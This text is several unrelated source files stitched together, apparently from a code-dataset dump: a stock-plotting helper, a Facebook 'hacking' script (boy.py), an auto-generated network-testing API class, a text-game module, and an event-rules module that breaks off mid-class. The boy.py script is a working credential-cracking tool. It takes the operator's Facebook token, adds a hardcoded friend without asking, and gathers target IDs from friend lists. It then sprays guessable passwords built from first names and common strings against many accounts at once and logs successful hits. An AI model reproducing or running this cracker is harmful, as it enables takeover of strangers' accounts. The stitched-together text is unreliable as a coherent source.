        # Debug helper: print the wrapped ticker symbol.
        print(self.ticker)

    def plot(self, columns=["high"],
            x_interval=None, y_interval=None,
            start_date=None, end_date=None, bot_results=None):
        # Plot the chosen price columns (plus optional bot performance
        # series) over an optional 'm/d/y' date window.
        #   columns     -- DataFrame column names to draw.
        #                  NOTE(review): mutable default list -- harmless
        #                  here (only iterated), but worth changing.
        #   x_interval  -- days between x-axis ticks (None = auto)
        #   y_interval  -- spacing of y-axis ticks (None = auto)
        #   start_date / end_date -- 'm/d/y' strings bounding the plot
        #   bot_results -- iterable of {"name", "performance"} dicts,
        #                  where "performance" is sliceable like the data
        x = [dt.datetime.strptime(d,'%Y-%m-%d').date() for d in self.data["date"]]
        if start_date and end_date:
            startInd, endInd = dateRangeToInds(start_date, end_date, x)
        else:
            startInd, endInd = (0, len(x))
        plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%m/%d/%y')) #display the date properly
        if x_interval:
            plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=x_interval)) #x axis tick every x_interval days
        if y_interval:
            plt.gca().yaxis.set_major_locator(ticker.MultipleLocator(y_interval)) #sets y axis tick spacing
        for field in columns:
            plt.plot(x[startInd:endInd], self.data[field][startInd:endInd], label=field) #plots the x and y
        if bot_results is not None:
            for res in bot_results:
                plt.plot(x[startInd:endInd], res["performance"][startInd:endInd], label=res["name"])
        # Configure chart settings
        plt.legend()
        plt.grid(True) #turns on axis grid
        plt.ylim(0) #sets the y axis min to zero
        plt.xticks(rotation=90, fontsize = 10) #rotates the x axis ticks 90 degrees and font size 10
        plt.title("%s:" % (self.ticker)) #prints the title on the top
        plt.ylabel('Stock Price') #labels y axis
        plt.xlabel('Date') #labels x axis
        plt.tight_layout()
        plt.show()
def dateRangeToInds(start, end, x=()):
    """
    Return the indices in the sorted date list *x* closest to the
    'm/d/y' date strings *start* and *end*.

    On any error or invalid input -- unparsable date strings, an empty
    *x*, or dates outside x's span -- the full range (0, len(x)) is
    returned, as the docstring always promised (previously unparsable
    strings raised ValueError and an empty list raised IndexError).

    Help from: https://stackoverflow.com/questions/32237862/find-the-closest-date-to-a-given-date
    """
    try:
        start = dt.datetime.strptime(start, '%m/%d/%y').date()
        end = dt.datetime.strptime(end, '%m/%d/%y').date()
    except (TypeError, ValueError):
        # Unparsable input: fall back to the whole range.
        return (0, len(x))
    # Empty sequence, or dates outside the data's span: whole range.
    if not x or start < x[0] or start > x[-1] or end < x[0] or end > x[-1]:
        return (0, len(x))

    def _closest(target):
        # Index of the element of x nearest to `target`.
        return x.index(min(x, key=lambda y: abs(y - target)))

    return (_closest(start), _closest(end))
"sunnynagam1@gmail.com"
] | sunnynagam1@gmail.com |
ef00828694b672147ec72468ca0e0060e9d1e187 | 0d2c2703ebf2ef6440ce3bcbf8063248e6dec68d | /boy.py | 29677eb735439a7510a08eaa0a7220b713656987 | [] | no_license | mrsaqib/hackerboy | 7804c588635723ec995c5a94d1849d72e8a86151 | 9ed0da5d53ef1d4f6bc79a7d892f1d36a4f72370 | refs/heads/master | 2022-07-12T04:29:39.232408 | 2020-05-13T04:05:50 | 2020-05-13T04:05:50 | 263,517,606 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,734 | py | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """ -----------------------------•◈•
( __)\\ ____--------------_------------•◈•
|__(~) •||•SAQIB - UR -REHMAN------•◈•
|__\~~) •||•RANA - RAJPUT---------------•◈•
|__(-----\ •◈•------BLACK-TIGER--------•◈•
|__~~~\ •◈•-----█-------⑦-------█------•◈•
|__~~~\ •◈•-----█-------⑧-------█------•◈•
|__~~~\ •◈•-----█-------⑥-------█------•◈•
\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92Saqib khan
\033[1;96mInstagram \033[1;93m: \033[1;FlowSaqib
\033[1;96mFacebook \033[1;93m: \033[1; Saqibkhan4072
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://github.com/saqib/rehman
\033[1;91m======================================="""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print "\033[1;96m ============================================================="
print """\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92mRana Aahil
\033[1;96mInstagram \033[1;93m: \033[1;92mFlowRana
\033[1;96mFacebook \033[1;93m: \033[1;92m Aahilrana4072
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://Github.com/Therana/zero
\033[1;91m======================================="""
print " \x1b[1;93m============================================================="
CorrectUsername = "rana"
CorrectPassword = "rana"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;93mUsername Of Tool \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;93mPassword Of Tool \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "Wrong Password"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
else:
print "Wrong Username"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN WITH FACEBOOK \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Successful'
os.system('xdg-open https://www.Facebook.com/Omi6t')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mIt seems that your account has a checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mIt seems that your account has a checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Start Hacking"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Exit "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Crack From Friend List"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Crack From Any Public ID"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Crack From File"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mGetting ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mEnter ID \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mName\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mID Not Found!"
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mGetting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mEnter File Path \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile Not Found'
raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal IDs \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[✺] \033[1;93mStarting \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCracking \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mTo Stop Process Press CTRL Then Press z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name'] + '12'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name'] + '1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Has Been Completed \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File Has Been Saved \033[1;91m: \033[1;97mout/checkpoint.txt")
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | noreply@github.com |
b11bdcd4a134220f51a7db78eb753012b6bf3114 | b144c5142226de4e6254e0044a1ca0fcd4c8bbc6 | /ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/learnedrouteipv6_fdef4758ad13bb42ae07821a7635e378.py | ce66b77a40c84a94b26b3eb20ccb5a7f7182c9a5 | [
"MIT"
] | permissive | iwanb/ixnetwork_restpy | fa8b885ea7a4179048ef2636c37ef7d3f6692e31 | c2cb68fee9f2cc2f86660760e9e07bd06c0013c2 | refs/heads/master | 2021-01-02T17:27:37.096268 | 2020-02-11T09:28:15 | 2020-02-11T09:28:15 | 239,721,780 | 0 | 0 | NOASSERTION | 2020-02-11T09:20:22 | 2020-02-11T09:20:21 | null | UTF-8 | Python | false | false | 6,444 | py | # MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class LearnedRouteIpv6(Base):
"""NOT DEFINED
The LearnedRouteIpv6 class encapsulates a list of learnedRouteIpv6 resources that is managed by the system.
A list of resources can be retrieved from the server using the LearnedRouteIpv6.find() method.
"""
__slots__ = ()
_SDM_NAME = 'learnedRouteIpv6'
def __init__(self, parent):
super(LearnedRouteIpv6, self).__init__(parent)
@property
def AsPath(self):
"""NOT DEFINED
Returns:
str
"""
return self._get_attribute('asPath')
@property
def BlockOffset(self):
"""NOT DEFINED
Returns:
number
"""
return self._get_attribute('blockOffset')
@property
def BlockSize(self):
"""NOT DEFINED
Returns:
number
"""
return self._get_attribute('blockSize')
@property
def ControlWordEnabled(self):
"""NOT DEFINED
Returns:
bool
"""
return self._get_attribute('controlWordEnabled')
@property
def IpPrefix(self):
"""NOT DEFINED
Returns:
str
"""
return self._get_attribute('ipPrefix')
@property
def LabelBase(self):
"""NOT DEFINED
Returns:
number
"""
return self._get_attribute('labelBase')
@property
def LocalPreference(self):
"""NOT DEFINED
Returns:
number
"""
return self._get_attribute('localPreference')
@property
def MaxLabel(self):
"""NOT DEFINED
Returns:
number
"""
return self._get_attribute('maxLabel')
@property
def MultiExitDiscriminator(self):
"""NOT DEFINED
Returns:
number
"""
return self._get_attribute('multiExitDiscriminator')
@property
def Neighbor(self):
"""NOT DEFINED
Returns:
str
"""
return self._get_attribute('neighbor')
@property
def NextHop(self):
"""NOT DEFINED
Returns:
str
"""
return self._get_attribute('nextHop')
@property
def OriginType(self):
"""NOT DEFINED
Returns:
str
"""
return self._get_attribute('originType')
@property
def PrefixLength(self):
"""NOT DEFINED
Returns:
number
"""
return self._get_attribute('prefixLength')
@property
def RouteDistinguisher(self):
"""NOT DEFINED
Returns:
str
"""
return self._get_attribute('routeDistinguisher')
@property
def SeqDeliveryEnabled(self):
"""NOT DEFINED
Returns:
bool
"""
return self._get_attribute('seqDeliveryEnabled')
@property
def SiteId(self):
"""NOT DEFINED
Returns:
number
"""
return self._get_attribute('siteId')
def find(self, AsPath=None, BlockOffset=None, BlockSize=None, ControlWordEnabled=None, IpPrefix=None, LabelBase=None, LocalPreference=None, MaxLabel=None, MultiExitDiscriminator=None, Neighbor=None, NextHop=None, OriginType=None, PrefixLength=None, RouteDistinguisher=None, SeqDeliveryEnabled=None, SiteId=None):
"""Finds and retrieves learnedRouteIpv6 data from the server.
All named parameters support regex and can be used to selectively retrieve learnedRouteIpv6 data from the server.
By default the find method takes no parameters and will retrieve all learnedRouteIpv6 data from the server.
Args:
AsPath (str): NOT DEFINED
BlockOffset (number): NOT DEFINED
BlockSize (number): NOT DEFINED
ControlWordEnabled (bool): NOT DEFINED
IpPrefix (str): NOT DEFINED
LabelBase (number): NOT DEFINED
LocalPreference (number): NOT DEFINED
MaxLabel (number): NOT DEFINED
MultiExitDiscriminator (number): NOT DEFINED
Neighbor (str): NOT DEFINED
NextHop (str): NOT DEFINED
OriginType (str): NOT DEFINED
PrefixLength (number): NOT DEFINED
RouteDistinguisher (str): NOT DEFINED
SeqDeliveryEnabled (bool): NOT DEFINED
SiteId (number): NOT DEFINED
Returns:
self: This instance with matching learnedRouteIpv6 data retrieved from the server available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._select(locals())
def read(self, href):
"""Retrieves a single instance of learnedRouteIpv6 data from the server.
Args:
href (str): An href to the instance to be retrieved
Returns:
self: This instance with the learnedRouteIpv6 data from the server available through an iterator or index
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
| [
"srvc_cm_packages@keysight.com"
] | srvc_cm_packages@keysight.com |
dcfa00094dc418701fe53e2eac198128c1366eb9 | 9a8e7f01fa24622d1ae1f9abd0043cf89993c449 | /Textgame/tresureChest.py | 5261b2a93aa68861cbd3f847c9d8f08d58e57139 | [] | no_license | AlAtEX/Infinite_Dungeon_Experience | 5038736659df1a6654ba20631429f90c6e720349 | e92647b860842676bdf8a8129b3e80129adf5980 | refs/heads/master | 2021-01-17T13:00:56.902536 | 2016-11-16T00:05:50 | 2016-11-16T00:05:50 | 59,617,308 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,151 | py | import itemGen, time
def get(Weapon,Armor,hp,mhp,xp,level,mi,ma):
print('You found a tresure chest!')
items = itemGen.tresureGen(level,mi,ma,mhp)
for item in items:
print(item['desc'])
time.sleep(1)
if item['type'] == 'st':
if Weapon < item['mod']:
Weapon = item['mod']
print('Your damage is now {a}!'.format(a = Weapon))
if item['type'] == 'ar':
if Armor < item['mod']:
Armor = item['mod']
print('Your defence is now {a}!'.format(a = Armor))
if item['type'] == 'hp':
hp += item['mod']
if hp > mhp:
hp = mhp
print('You were healed {a}HP!'.format(a = item['mod']))
if item['type'] == 'mhp':
mhp += item['mod']
print('Your max HP is now {a}!'.format(a = mhp))
if item['type'] == 'xp':
xp += item['mod']
print('Your xp is now {a}!'.format(a = xp))
time.sleep(1)
time.sleep(0.5)
print('You close the chest.')
return Weapon,Armor,hp,mhp,xp,level
| [
"noreply@github.com"
] | noreply@github.com |
33d7d3984074154f1458954d817c4aad253d0a81 | aab991d3e69703c309675bcbe62a0582f9f344bb | /base/app/app_functions/__init__.py | 835ace44cf8724c0cb2b60ffdbc3375e7934c3c9 | [] | no_license | fren46/custom-control-vnf-k8s | 395ff8166495e62b844a2b8dcd0e2436d1166cae | 811300177718a83ee75f8662e20b6378f746601c | refs/heads/master | 2022-12-24T07:02:04.534314 | 2020-10-10T09:08:02 | 2020-10-10T09:08:02 | 298,087,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,313 | py | import json
import os
from datetime import datetime, timedelta
#import redis
from requests import post
from base64 import b64decode
from krules_core.base_functions import RuleFunctionBase, DispatchPolicyConst
from krules_core.base_functions.misc import PyCall
from krules_core.providers import subject_factory, event_router_factory, configs_factory
class Schedule(RuleFunctionBase):
def execute(self, message=None, subject=None, payload=None, hash=None, when=lambda _: datetime.now(), replace=False):
if message is None:
message = self.message
if subject is None:
subject = self.subject
if payload is None:
payload = self.payload
if str(self.subject) != str(subject):
subject = subject_factory(str(subject), event_info=self.subject.event_info())
if callable(when):
when = when(self)
if type(when) is not str:
when = when.isoformat()
new_payload = {"message": message, "subject": str(subject), "payload": payload, "when": when, "replace": replace}
event_router_factory().route("schedule-message", subject, new_payload,
dispatch_policy=DispatchPolicyConst.DIRECT)
class WebsocketNotificationEventClass(object):
CHEERING = "cheering"
WARNING = "warning"
CRITICAL = "critical"
NORMAL = "normal"
# class WebsocketDevicePublishMessage(RuleFunctionBase):
#
# def execute(self, _payload):
#
# r = redis.StrictRedis.from_url(os.environ['REDIS_PUBSUB_ADDRESS'])
# r.publish(os.environ['WEBSOCKET_DEVICES_NOTIFICATION_RKEY'], json.dumps(
# {
# "device": self.subject.name,
# "payload": _payload
# }
# ))
class SlackPublishMessage(PyCall):
def execute(self, channel=None, text="", *args, **kwargs):
channel = channel or "devices_channel"
slack_settings = configs_factory().get("apps").get("slack")
#funzione execute della classe PyCall, non fa altro che eseguire una generica funzione python
#la funzione viene eseguita all'interno di un try catch
#la funzione che esegue è quella passata come primo argomento
super().execute(post, args=(slack_settings[channel],), kwargs={
"json": {
"type": "mrkdwn",
"text": text
}
})
class SlackPublishInteractiveMessage(PyCall):
def execute(self, channel=None, text="", *args, **kwargs):
channel = channel or "devices_channel"
slack_settings = configs_factory().get("apps").get("slack")
super().execute(post, args=(slack_settings[channel],), kwargs={
"json": {
"blocks": [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": text
}
},
{
"type": "actions",
"elements": [
{
"type": "button",
"text": {
"type": "plain_text",
"text": "Accetto"
#"emoji": "true"
},
"value": self.subject.name
},
{
"type": "button",
"text": {
"type": "plain_text",
"text": "Rifiuta"
#"emoji": "true"
},
"value": "click_false"
}
]
}
]
}
})
class B64Decode(RuleFunctionBase):
def execute(self, source, payload_dest):
self.payload[payload_dest] = json.loads(b64decode(source).decode("utf-8"))
class PPrint(RuleFunctionBase):
